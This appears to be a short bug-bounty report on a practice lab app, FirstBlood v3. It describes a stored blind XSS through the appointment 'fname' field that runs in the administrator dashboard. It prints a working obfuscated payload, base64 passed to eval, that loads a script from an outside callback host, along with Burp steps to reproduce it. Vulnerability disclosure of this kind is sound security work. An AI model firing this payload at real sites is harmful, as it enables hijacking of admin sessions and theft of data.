FirstBlood-#1608 — Blind XSS on Internal Dashboard of Adminstrator (Manage Appointments)
This issue was discovered on FirstBlood v3
On 2022-12-12, mr_xhunt
Found Blind XSS on the Internal Dashboard of the Administrator, where the Administrator can view and Manage the Appointments.
Steps To Reproduce:
- Create an Appointment and Intercept the Request in the Burp
- Now in the Burpsuite Change the
with the payload : x"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXJ4aHVudC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(>
NOTE: You must add ambulance parameter as well with value equal to 1

- Wait for a few hrs or days (mine though executed after a few days) the XSS will execute

The Attacker can run arbitrary Scripts and can Fuzz all the endpoints available their and Can get the data using webhook Url.
Any parameter which is directly inserted into the source must be Sanitized first and Checked for containing any malicious payload
Endpoint: /manage_appointment.php
Parameter: fname
Payload: x"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXJ4aHVudC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(>
FirstBlood ID: 78
Vulnerability Type: Stored XSS
When booking an appointment with the ambulance value set to "1", the users full name is vulnerable to stored XSS on the internal admin panel ""
